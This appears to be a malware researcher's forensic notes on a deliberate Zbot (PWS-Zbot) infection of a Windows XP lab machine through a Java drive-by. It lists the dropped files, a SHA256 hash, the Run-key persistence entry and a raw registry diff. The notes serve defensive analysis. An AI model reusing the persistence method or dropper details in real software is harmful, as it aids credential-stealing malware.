C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\{CE9EB670-04D2-11E2-A16C-08002765500A}.dat		12KB		A		9/22/2012 12:30:44 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\{E0F1E810-04D2-11E2-A16C-08002765500A}.dat		12KB		A		9/22/2012 12:31:03 PM
C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\{ED37A190-04D2-11E2-A16C-08002765500A}.dat		4KB		A		9/22/2012 12:31:17 PM
C:\Documents and Settings\bomber\Local Settings\Temp\au-descriptor-1.6.0_35-b10.xml		8KB		A		9/22/2012 12:30:11 PM
C:\Documents and Settings\bomber\Local Settings\Temp\V.class		7KB		A		9/22/2012 12:34:03 PM
C:\Documents and Settings\bomber\Local Settings\Temp\wgsdgsdgdsgsd.exe		289KB		A		9/22/2012 12:34:06 PM
C:\Documents and Settings\bomber\Local Settings\Temp\wireshark_D6F459B6-57F0-41B4-99AF-16CEB1102BB5_20120922123113_a02096		1,026KB		A		9/22/2012 12:32:07 PM
C:\Documents and Settings\bomber\Local Settings\Temp\wireshark_D6F459B6-57F0-41B4-99AF-16CEB1102BB5_20120922123320_a03904		1,999KB		A		9/22/2012 12:34:30 PM
C:\Documents and Settings\bomber\Local Settings\Temp\hsperfdata_bomber\1864		66KB		A		9/22/2012 12:31:18 PM
C:\Documents and Settings\bomber\Local Settings\Temp\hsperfdata_bomber\2424		66KB		A		9/22/2012 12:33:59 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\de[1].png		1KB		A		9/22/2012 12:28:41 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\domainmap[3].gif		1KB		A		9/22/2012 12:30:59 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\hcp_asx[1].htm		1KB		A		9/22/2012 12:33:46 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\hcp_asx[2].htm		1KB		A		9/22/2012 12:34:02 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\login[2].htm		12KB		A		9/22/2012 12:28:37 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\ro[1].png		1KB		A		9/22/2012 12:28:42 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\sCA5PUYED		2KB		A		9/22/2012 12:30:12 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\sCA704DOF		2KB		A		9/22/2012 12:30:10 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\sCAEF3BT4		2KB		A		9/22/2012 12:30:14 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\sCAEOTJ4L		2KB		A		9/22/2012 12:30:12 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\sCAVO38L3		2KB		A		9/22/2012 12:30:11 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\screenshot[2].jpg		37KB		A		9/22/2012 12:30:59 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\searchCA0Y1H1G		1KB		A		9/22/2012 12:30:14 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\searchCA2KHYDQ		1KB		A		9/22/2012 12:30:10 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\searchCA6GXH8C		1KB		A		9/22/2012 12:30:14 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\search[1].htm		76KB		A		9/22/2012 12:30:16 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\CAKLU50N.HTM		1KB		A		9/22/2012 12:34:00 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\dnsd[1].css		4KB		A		9/22/2012 12:29:38 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\help_16[1]		4KB		A		9/22/2012 12:31:15 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\qsonhs[1].aspx		1KB		A		9/22/2012 12:28:38 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\redir_not_found[1].htm		6KB		A		9/22/2012 12:29:18 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\report[1].htm		111KB		A		9/22/2012 12:30:56 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\sCA0R10DS		2KB		A		9/22/2012 12:30:14 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\sCA9YH18O		2KB		A		9/22/2012 12:30:14 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\sCAVXGZO1		2KB		A		9/22/2012 12:30:09 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\searchCA6QGIGC		1KB		A		9/22/2012 12:30:12 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\searchCA9XHX7I		1KB		A		9/22/2012 12:30:10 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\searchCAAK6LMZ		1KB		A		9/22/2012 12:30:12 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\searchCAB0WC2R		1KB		A		9/22/2012 12:30:14 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\searchCAVTOWF0		1KB		A		9/22/2012 12:30:11 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\searchCAYG9PUT		1KB		A		9/22/2012 12:30:10 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\tabswelcome[1]		15KB		A		9/22/2012 12:31:15 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\close_nor[1]		3KB		A		9/22/2012 12:31:15 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\collapse_nor[1]		3KB		A		9/22/2012 12:31:15 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\expand_nor[1]		3KB		A		9/22/2012 12:31:15 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\google_com[1].htm		109KB		A		9/22/2012 12:30:02 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\main[1].htm		93KB		A		9/22/2012 12:33:59 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\NewTabPageScripts[2]		4KB		A		9/22/2012 12:31:15 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\report[2].htm		507KB		A		9/22/2012 12:30:38 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\sCA3FAUVH		2KB		A		9/22/2012 12:30:14 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\sCABOLW00		2KB		A		9/22/2012 12:30:14 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\sCANL4B03		2KB		A		9/22/2012 12:30:12 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\searchCA2HS76W		1KB		A		9/22/2012 12:30:10 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\searchCA2PPY3O		1KB		A		9/22/2012 12:30:14 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\searchCAGLGZBP		1KB		A		9/22/2012 12:30:14 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\s[10]		2KB		A		9/22/2012 12:30:10 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\s[11]		2KB		A		9/22/2012 12:30:11 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\ua[1].png		1KB		A		9/22/2012 12:28:42 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\urlquery_net[1].htm		41KB		A		9/22/2012 12:28:40 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\728x90-1[1].gif		76KB		A		9/22/2012 12:29:38 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\banner-fade[1].gif		2KB		A		9/22/2012 12:29:38 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\domainmap[1].gif		34KB		A		9/22/2012 12:30:30 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\home[1].aspx		57KB		A		9/22/2012 12:33:47 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\il[1].png		1KB		A		9/22/2012 12:28:42 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\jp[1].png		1KB		A		9/22/2012 12:28:42 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\sCA9X3PTW		2KB		A		9/22/2012 12:30:13 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\sCAVC54LS		2KB		A		9/22/2012 12:30:14 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\screenshot[2].jpg		160KB		A		9/22/2012 12:30:30 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\searchCAOZA5VK		1KB		A		9/22/2012 12:30:13 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\searchCAQVDE8Y		1KB		A		9/22/2012 12:30:14 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\searchCAUMFERF		1KB		A		9/22/2012 12:30:12 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\search[10]		1KB		A		9/22/2012 12:30:10 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\search[11]		1KB		A		9/22/2012 12:30:11 PM
C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\top[1]		9KB		A		9/22/2012 12:31:15 PM
C:\Documents and Settings\bomber\My Documents\pcap.pcapng		1,026KB		A		9/22/2012 12:32:14 PM
C:\WINDOWS\Sun		1KB		D
C:\WINDOWS\Sun\Java		1KB		D
C:\WINDOWS\Sun\Java\Deployment		1KB		D
C:\WINDOWS\Prefetch\DUMPCAP.EXE-241FFA5D.pf		37KB		A		9/22/2012 12:33:30 PM
C:\WINDOWS\Prefetch\JAVA.EXE-0C263507.pf		71KB		A		9/22/2012 12:34:01 PM
C:\WINDOWS\Prefetch\JAVAWS.EXE-021AC9A9.pf		12KB		A		9/22/2012 12:30:19 PM
C:\WINDOWS\Prefetch\JUCHECK.EXE-1B0E4D0A.pf		33KB		A		9/22/2012 12:30:19 PM
C:\WINDOWS\Prefetch\MYZYN.EXE-02389B08.pf		18KB		A		9/22/2012 12:31:41 PM
C:\WINDOWS\Prefetch\RUNDLL32.EXE-1EDA2CF6.pf		22KB		A		9/22/2012 12:31:47 PM
C:\WINDOWS\Prefetch\SETUP_WM.EXE-3135CBD6.pf		34KB		A		9/22/2012 12:33:43 PM
C:\WINDOWS\Prefetch\WGSDGSDGDSGSD.EXE-058972B5.pf		20KB		A		9/22/2012 12:34:17 PM
C:\WINDOWS\Prefetch\WIRESHARK.EXE-0525E272.pf		53KB		A		9/22/2012 12:28:58 PM
C:\WINDOWS\Prefetch\WMPLAYER.EXE-18DDEF9C.pf		59KB		A		9/22/2012 12:34:04 PM
C:\WINDOWS\system32\d3d9caps.dat		1KB		A		9/22/2012 12:33:59 PM
C:\WINDOWS\system32\wmpns.dll		222KB		A		4/14/2008 8:00:00 AM

The cookies were not created as part of the infection. One was from MSN.com (opens by default in Windows XP), one was from URLquery.net, one by a redirected site which was my first attempt at infection and the other was unrelated.

The files C:\Documents and Settings\bomber\Local Settings\Temp\hsperfdata_bomber\1864 and C:\Documents and Settings\bomber\Local Settings\Temp\hsperfdata_bomber\2424 were in "use" once the system was compromised, indicating it was being used by the application.These files are created by java's temporary needs and I have seen them on quite a few systems that were infected. More often, however, I have seen the folder hsperfdata_%username% empty post infection.

myzyn.exe is recognized as PWS-Zbot.

SHA256:	0236a656dff29bbdb5114b0c036dbae89ea4c8f68641c3a7bb0ebeb05c827199
File name:	myzyn.exe
Detection ratio:	28 / 43
Analysis date:	2012-09-22 17:42:05 UTC ( 43 minutes ago )

https://www.virustotal.com/file/0236a656dff29bbdb5114b0c036dbae89ea4c8f68641c3a7bb0ebeb05c827199/analysis/1348335725/

Now Onto the Registry

Persistence was established through HKCU\Software\Microsoft\Windows\CurrentVersion\Run, nothing special here.

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Orimdie

""C:\Documents and Settings\bomber\Application Data\Feuw\myzyn.exe""

Here is the full dump of the registry changes, which admittedly is contaminated by some Windows XP legitimate activity surrounding these first launch of some programs like Windows Media Player and my download of Java from oldversion.com - which was unexpected.. I will use the lessons learned here in future studies.

backhole1 - Registry

Key	Value	Data Before	Data After
HKEY_CLASSES_ROOT\WMP.DeskBand
HKEY_CLASSES_ROOT\WMP.DeskBand	@		"Windows Media Player"
HKEY_CLASSES_ROOT\WMP.DeskBand\CLSID
HKEY_CLASSES_ROOT\WMP.DeskBand\CLSID	@		"{0A4286EA-E355-44FB-8086-AF3DF7645BD9}"
HKEY_CLASSES_ROOT\WMP.DeskBand.1
HKEY_CLASSES_ROOT\WMP.DeskBand.1	@		"Windows Media Player"
HKEY_CLASSES_ROOT\WMP.DeskBand.1\CLSID
HKEY_CLASSES_ROOT\WMP.DeskBand.1\CLSID	@		"{0A4286EA-E355-44FB-8086-AF3DF7645BD9}"
HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}
HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}	@		"Windows Media Player"
HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\Implemented Categories
HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\Implemented Categories\{00021492-0000-0000-C000-000000000046}
HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\InprocServer32
HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\InprocServer32	@		"C:\PROGRA~1\WINDOW~2\wmpband.dll"
HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\InprocServer32	ThreadingModel		"Apartment"
HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\ProgID
HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\ProgID	@		"WMP.DeskBand.1"
HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\VersionIndependentProgID
HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\VersionIndependentProgID	@		"WMP.DeskBand"
HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}
HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}	@		"IWMPDeskBand"
HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\ProxyStubClsid
HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\ProxyStubClsid	@		"{00020424-0000-0000-C000-000000000046}"
HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\ProxyStubClsid32
HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\ProxyStubClsid32	@		"{00020424-0000-0000-C000-000000000046}"
HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\TypeLib
HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\TypeLib	@		"{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}"
HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\TypeLib	Version		"1.0"
HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/x-wmplayer
HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/x-wmplayer	CLSID		"{cd3afa96-b84f-48f0-9393-7edc34128127}"
HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}
HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0
HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0	@		"WMPDeskBand 1.0 Type Library"
HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\0
HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\0\win32
HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\0\win32	@		"C:\PROGRA~1\WINDOW~2\wmpband.dll"
HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\FLAGS
HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\FLAGS	@		"0"
HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\HELPDIR
HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\HELPDIR	@		"C:\PROGRA~1\WINDOW~2\"
HKEY_CURRENT_USER\Identities	Identity Ordinal	dword:00000001	dword:00000002
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}	Identity Ordinal		dword:00000001
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0	VerStamp	dword:00000000	dword:00000003
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0	SpellDontIgnoreDBCS		dword:00000001
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0	MSIMN		dword:00000001
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0	StoreMigratedV5		dword:00000001
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0	ConvertedToDBX		dword:00000001
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0	Settings Upgraded		dword:00000007
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0	Running		dword:00000000
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0	Store Root		hex(2):25,55,73,65,72,50,72,6f,66,69,6c,65,25,5c,4c,6f,63,61,6c,20,53,65,74,74,69,6e,67,73,5c,41,70,70,6c,69,63,61,74,69,6f,6e,20,44,61,74,61,5c,49,64,65,6e,74,69,74,69,65,73,5c,7b,46,30,37,46,43,37,31,39,2d,31,38,45,42,2d,34,42,37,31,2d,38,31,30,43,2d,43,41,44,36,46,43,39,32,30,38,35,37,7d,5c,4d,69,63,72,6f,73,6f,66,74,5c,4f,75,74,6c,6f,6f,6b,20,45,78,70,72,65,73,73,5c,00,
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0	SpoolerDlgPos		hex:2c,00,00,00,00,00,00,00,01,00,00,00,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,b6,01,00,00,a9,00,00,00,9e,03,00,00,43,01,00,00,
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0	SpoolerTack		dword:00000000
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0	Compact Check Count		dword:00000001
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail	Welcome Message		dword:00000000
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail	Accounts Checked		hex:00,00,00,00,
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail	Safe Attachments		dword:00000001
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail	Secure Safe Attachments		dword:00000001
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail	Default_CodePage		dword:00006faf
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\News
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\News	Accounts Checked		hex:00,00,00,00,
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Rules
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Rules\Mail
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Trident
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Trident\Main
HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Trident\Settings
HKEY_CURRENT_USER\Software\JavaSoft\Java Runtime Environment
HKEY_CURRENT_USER\Software\JavaSoft\Java Runtime Environment\1.6.0_29
HKEY_CURRENT_USER\Software\JavaSoft\Java Runtime Environment\1.6.0_29	BalloonShown		dword:00000001
HKEY_CURRENT_USER\Software\JavaSoft\Java Update
HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy
HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy	LastUpdateBeginTime		"Sat, 22 Sep 2012 16:30:08 GMT"
HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy	LastUpdateFinishTime		"Sat, 22 Sep 2012 16:30:09 GMT"
HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy	VersionXmlURL		"http://javadl-esd.sun.com/update/1.6.0/au-descriptor-1.6.0_35-b10.xml"
HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy\JavaFX
HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy\JavaFX	UpdateSchedule		dword:00000011
HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy\JavaFX	UpdateScheduleMinutes		dword:0000001a
HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy\JavaFX	Frequency		dword:00000020
HKEY_CURRENT_USER\Software\JavaSoft\Java Update\Policy\JavaFX	LastUpdateInvokedTime		"Sat, 22 Sep 2012 16:30:09 GMT"
HKEY_CURRENT_USER\Software\Microsoft\Direct3D
HKEY_CURRENT_USER\Software\Microsoft\Direct3D\MostRecentApplication
HKEY_CURRENT_USER\Software\Microsoft\Direct3D\MostRecentApplication	Name		"java.exe"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager	Server ID		dword:00000004
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager	Default LDAP Account		"Active Directory GC"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts	PreConfigVer		dword:00000004
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts	PreConfigVerNTDS		dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts	ConnectionSettingsMigrated		dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts	AssociatedID		hex:19,c7,7f,f0,eb,18,71,4b,81,0c,ca,d6,fc,92,08,57,
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC	LDAP Server ID		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC	Account Name		"Active Directory"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC	LDAP Server		"NULL"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC	LDAP Search Return		dword:00000064
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC	LDAP Timeout		dword:0000003c
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC	LDAP Authentication		dword:00000002
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC	LDAP Simple Search		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC	LDAP Bind DN		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC	LDAP Port		dword:00000cc4
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC	LDAP Resolve Flag		dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC	LDAP Secure Connection		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC	LDAP User Name		"NULL"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC	LDAP Search Base		"NULL"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot	LDAP Server ID		dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot	Account Name		"Bigfoot Internet Directory Service"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot	LDAP Server		"ldap.bigfoot.com"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot	LDAP URL		"http://www.bigfoot.com"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot	LDAP Search Return		dword:00000064
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot	LDAP Timeout		dword:0000003c
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot	LDAP Authentication		dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot	LDAP Simple Search		dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot	LDAP Logo		hex(2):25,50,72,6f,67,72,61,6d,46,69,6c,65,73,25,5c,43,6f,6d,6d,6f,6e,20,46,69,6c,65,73,5c,53,65,72,76,69,63,65,73,5c,62,69,67,66,6f,6f,74,2e,62,6d,70,00,
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign	LDAP Server ID		dword:00000002
